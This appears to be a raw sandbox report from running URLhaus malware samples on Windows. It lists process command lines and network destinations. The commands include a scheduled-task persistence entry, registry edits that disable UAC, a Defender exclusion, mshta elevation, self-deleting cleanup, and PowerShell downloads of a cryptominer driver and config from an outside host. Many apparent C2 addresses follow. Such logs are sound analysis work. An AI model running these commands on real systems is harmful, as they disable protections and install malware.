"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8da0246f8,0x7ff8da024708,0x7ff8da024718

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "http" /tr '"C:\Users\Admin\AppData\Roaming\http.exe"'

C:\Users\Admin\Downloads\UrlHausFiles\build.exe

"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe

"C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Update.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Update.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\240D.tmp\240E.tmp\240F.bat C:\Users\Admin\Downloads\UrlHausFiles\nguyentri38.exe"

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

"C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,17857860338171674189,10138028533105000406,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\DK.exe

"C:\Users\Admin\Downloads\UrlHausFiles\DK.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BED.tmp\2BEE.tmp\2BEF.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Users\Admin\AppData\Roaming\http.exe

"C:\Users\Admin\AppData\Roaming\http.exe"

C:\Users\Admin\Downloads\UrlHausFiles\wow.exe

"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "

C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\V1.1.exe"

C:\Users\Admin\AppData\Roaming\Bypass.exe

Bypass.exe

C:\Users\Admin\AppData\Local\Temp\Defender.exe

"C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D

C:\Users\Admin\AppData\Local\Temp\2E6E.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\2E6E.tmp.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Yellow%20Pages%20Scraper.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Yellow%20Pages%20Scraper.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\Downloads\UrlHausFiles\random.exe

"C:\Users\Admin\Downloads\UrlHausFiles\random.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5192 -ip 5192

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 876

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5808 -ip 5808

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 1012

C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\AppCompat\Programs\360.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4DAE.tmp\4DAF.tmp\4DB0.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\JKKKJJJKJKFH" & exit

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Windows\AppCompat\Programs\360Srv.exe

C:\Program Files (x86)\Microsoft\DesktopLayer.exe

"C:\Program Files (x86)\Microsoft\DesktopLayer.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe"

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Users\Admin\Downloads\UrlHausFiles\win.exe

"C:\Users\Admin\Downloads\UrlHausFiles\win.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:7396 CREDAT:17410 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"

C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe

"C:\Users\Admin\Downloads\UrlHausFiles\opengl32.dll40watson-sanchez4040830.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\5BD7.tmp.x.exe

"C:\Users\Admin\AppData\Local\Temp\5BD7.tmp.x.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Users\Admin\Downloads\UrlHausFiles\N67fLgN.exe

"C:\Users\Admin\Downloads\UrlHausFiles\N67fLgN.exe"

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\UrlHausFiles\networks.ps1"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Users\Admin\AppData\Local\Temp\7645.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\7645.tmp.zx.exe"

C:\Users\Admin\Downloads\UrlHausFiles\4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"

C:\Users\Admin\AppData\Local\Temp\7645.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\7645.tmp.zx.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\System.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Users\Admin\Downloads\UrlHausFiles\test.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test.exe"

C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe

"C:\Users\Admin\Downloads\UrlHausFiles\XClient.exe"

C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\downloader.exe"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xxx.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8db5646f8,0x7ff8db564708,0x7ff8db564718

Network

Country Destination Domain Proto
US 8.8.8.8:53 urlhaus.abuse.ch udp
US 151.101.130.49:443 urlhaus.abuse.ch tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 49.130.101.151.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 csg-app.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 utorrent-backup-server4.top udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
RU 31.41.244.11:80 31.41.244.11 tcp
US 154.216.17.44:80 154.216.17.44 tcp
TH 165.154.184.75:80 165.154.184.75 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
IT 212.28.178.113:8888 212.28.178.113 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
CN 125.33.228.48:8085 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 183.30.204.105:81 tcp
CN 123.130.204.103:8888 tcp
ES 81.42.249.132:1080 81.42.249.132 tcp
PL 79.184.130.68:2137 79.184.130.68 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
DE 49.12.117.119:80 49.12.117.119 tcp
FR 5.253.59.29:80 5.253.59.29 tcp
FR 5.253.59.29:80 5.253.59.29 tcp
RU 31.41.244.11:80 31.41.244.11 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
NL 45.200.148.45:443 tcp
CN 139.196.31.48:14417 tcp
CN 114.215.27.238:2324 tcp
CN 101.229.61.157:8072 tcp
CN 114.215.27.238:8100 tcp
CN 110.90.9.121:8072 tcp
TR 5.26.97.52:88 tcp
JP 122.31.166.101:80 122.31.166.101 tcp
IN 111.118.250.244:80 111.118.250.244 tcp
CA 76.11.16.231:80 76.11.16.231 tcp
US 75.18.210.21:80 75.18.210.21 tcp
CA 99.233.83.22:80 99.233.83.22 tcp
FR 80.15.103.89:80 80.15.103.89 tcp
CN 112.27.225.72:8001 tcp
CN 110.40.250.173:2324 tcp
US 67.190.47.69:8081 67.190.47.69 tcp
CN 124.70.36.56:80 tcp
KR 121.142.127.237:8605 121.142.127.237 tcp
CN 121.235.184.125:9000 tcp
CN 61.183.16.127:14417 tcp
CN 58.208.14.94:88 tcp
KR 218.155.74.6:7070 218.155.74.6 tcp
CN 150.158.146.215:80 tcp
BR 187.59.102.238:9090 187.59.102.238 tcp
CN 111.42.156.130:8000 tcp
BR 189.61.50.98:8080 189.61.50.98 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
CN 47.103.126.166:8072 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
HK 149.88.73.206:80 149.88.73.206 tcp
US 141.155.36.213:41790 141.155.36.213 tcp
CA 184.145.33.5:80 tcp
CN 43.241.17.145:8899 tcp
US 96.250.166.185:88 96.250.166.185 tcp
US 24.252.169.236:80 24.252.169.236 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
MX 187.144.154.105:80 tcp
CA 76.68.62.152:80 76.68.62.152 tcp
CA 99.234.132.85:80 99.234.132.85 tcp
MX 187.225.233.208:80 tcp
CA 142.67.169.45:80 142.67.169.45 tcp
BE 109.137.108.215:8083 109.137.108.215 tcp
US 166.145.98.1:80 166.145.98.1 tcp
FR 109.210.138.197:80 109.210.138.197 tcp
TR 5.26.174.234:80 5.26.174.234 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 utorrent-backup-server2.top udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 win-network-checker.cc udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 utorrent-backup-server5.top udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:80 github.com tcp
KR 154.90.62.248:80 tcp
FR 80.15.103.89:443 tcp
BR 187.115.56.93:8081 tcp
AT 81.10.240.105:80 81.10.240.105 tcp
VN 103.110.33.188:80 103.110.33.188 tcp
US 8.8.8.8:53 src1.minibai.com udp
HK 43.132.13.252:9000 43.132.13.252 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
CN 101.35.228.105:8888 tcp
VN 103.77.173.146:80 tcp
CN 123.117.136.97:9000 tcp
US 50.116.92.169:443 csg-app.com tcp
US 20.83.148.22:8080 20.83.148.22 tcp
CN 139.198.15.223:8080 tcp
CN 61.182.69.190:11111 tcp
CN 203.2.65.29:8086 tcp
RU 176.113.115.37:80 176.113.115.37 tcp
US 50.116.92.169:443 csg-app.com tcp
US 50.116.92.169:443 csg-app.com tcp
US 8.8.8.8:53 server.toeicswt.co.kr udp
KW 178.61.160.6:5001 tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 file.blackint3.com udp
GB 82.31.159.47:80 tcp
US 8.8.8.8:53 udp
KR 210.116.108.238:80 server.toeicswt.co.kr tcp
ID 103.123.98.86:80 tcp
VN 103.77.173.146:80 tcp
US 8.8.8.8:53 softbank126023203236.bbtec.net udp
US 144.34.162.13:80 fish.hackbiji.cc tcp
US 8.8.8.8:53 udp
KR 211.249.219.23:80 cfs9.blog.daum.net tcp
US 8.8.8.8:53 varied-flux-emails-grounds.trycloudflare.com udp
US 104.16.230.132:443 tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 sms-szfang.com udp
CN 211.149.230.178:80 tcp
CN 14.205.93.60:80 tcp
US 8.8.8.8:53 udp
CN 124.67.254.109:61234 tcp
US 20.83.148.22:80 tcp
CN 180.167.115.186:8011 tcp
HK 8.217.48.27:80 tcp
US 8.8.8.8:53 wrench-creter.sbs udp
CN 122.143.2.98:80 tcp
CN 121.40.100.23:12616 tcp
CN 180.163.141.185:80 tcp
US 8.8.8.8:53 slam-whipp.sbs udp
US 8.8.8.8:53 cfs7.blog.daum.net udp
US 8.8.8.8:53 record-envyp.sbs udp
CN 101.133.156.69:7777 tcp
CN 223.247.198.16:8072 tcp
US 8.8.8.8:53 236.203.23.126.in-addr.arpa udp
KR 121.53.85.3:80 cfs7.blog.daum.net tcp
JP 126.23.203.236:80 softbank126023203236.bbtec.net tcp
CN 182.149.206.216:88 tcp
US 8.8.8.8:53 copper-replace.sbs udp
US 8.8.8.8:53 3.85.53.121.in-addr.arpa udp
US 8.8.8.8:53 savvy-steereo.sbs udp
US 8.8.8.8:53 preside-comforter.sbs udp
CN 47.104.169.91:80 tcp
CN 101.200.223.34:80 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 bitkiselurunsiparis.com udp
TR 94.73.144.130:443 bitkiselurunsiparis.com tcp
RU 193.233.48.194:80 193.233.48.194 tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
CN 113.219.177.95:8087 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
JP 137.220.142.71:443 sms-szfang.com tcp
US 8.8.8.8:53 marshal-zhukov.com udp
N/A 127.0.0.1:58116 tcp
CN 47.104.233.213:8072 tcp
US 8.8.8.8:53 61.91.186.125.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 166.166.188.230:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 sjlwql.top udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
CN 112.5.156.15:20006 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.21.82.174:443 marshal-zhukov.com tcp
HK 185.106.176.102:80 185.106.176.102 tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 130.144.73.94.in-addr.arpa udp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 download.caihong.com udp
US 8.8.8.8:53 casacoimbramaputo.com udp
CN 58.47.69.177:80 download.caihong.com tcp
US 8.8.8.8:53 gladim.sbs udp
US 209.124.70.44:443 casacoimbramaputo.com tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 174.82.21.104.in-addr.arpa udp
US 103.130.147.211:80 103.130.147.211 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 storage.soowim.co.kr udp
US 8.8.8.8:53 71.210.130.94.in-addr.arpa udp
US 8.8.8.8:53 71.142.220.137.in-addr.arpa udp
US 8.8.8.8:53 44.70.124.209.in-addr.arpa udp
US 8.8.8.8:53 102.176.106.185.in-addr.arpa udp
US 8.8.8.8:53 211.147.130.103.in-addr.arpa udp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
US 8.8.8.8:53 kiemthehuyenlong.com udp
VN 103.163.214.66:80 kiemthehuyenlong.com tcp
US 8.8.8.8:53 152.165.216.210.in-addr.arpa udp
HK 143.92.62.107:80 143.92.62.107 tcp
DE 94.130.210.71:443 gladim.sbs tcp
IN 103.117.156.102:80 103.117.156.102 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 66.214.163.103.in-addr.arpa udp
US 8.8.8.8:53 107.62.92.143.in-addr.arpa udp
US 8.8.8.8:53 139520.aioc.qbgxl.com udp
VN 113.160.249.9:80 113.160.249.9 tcp
CN 61.160.195.64:80 139520.aioc.qbgxl.com tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 102.156.117.103.in-addr.arpa udp
US 8.8.8.8:53 perfectperu.com udp
US 13.58.157.220:10640 tcp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
AR 200.58.120.6:80 perfectperu.com tcp
CN 112.5.156.15:20006 tcp
US 8.8.8.8:53 9.249.160.113.in-addr.arpa udp
FR 85.25.72.70:80 85.25.72.70 tcp
US 8.8.8.8:53 api.telegram.org udp
DE 94.130.210.71:443 gladim.sbs tcp
US 8.8.8.8:53 70.72.25.85.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 158.101.35.62:9000 158.101.35.62 tcp
CN 180.117.160.2:80 tcp
NL 185.202.113.6:443 tcp
US 8.8.8.8:53 hseda.com udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 6.120.58.200.in-addr.arpa udp
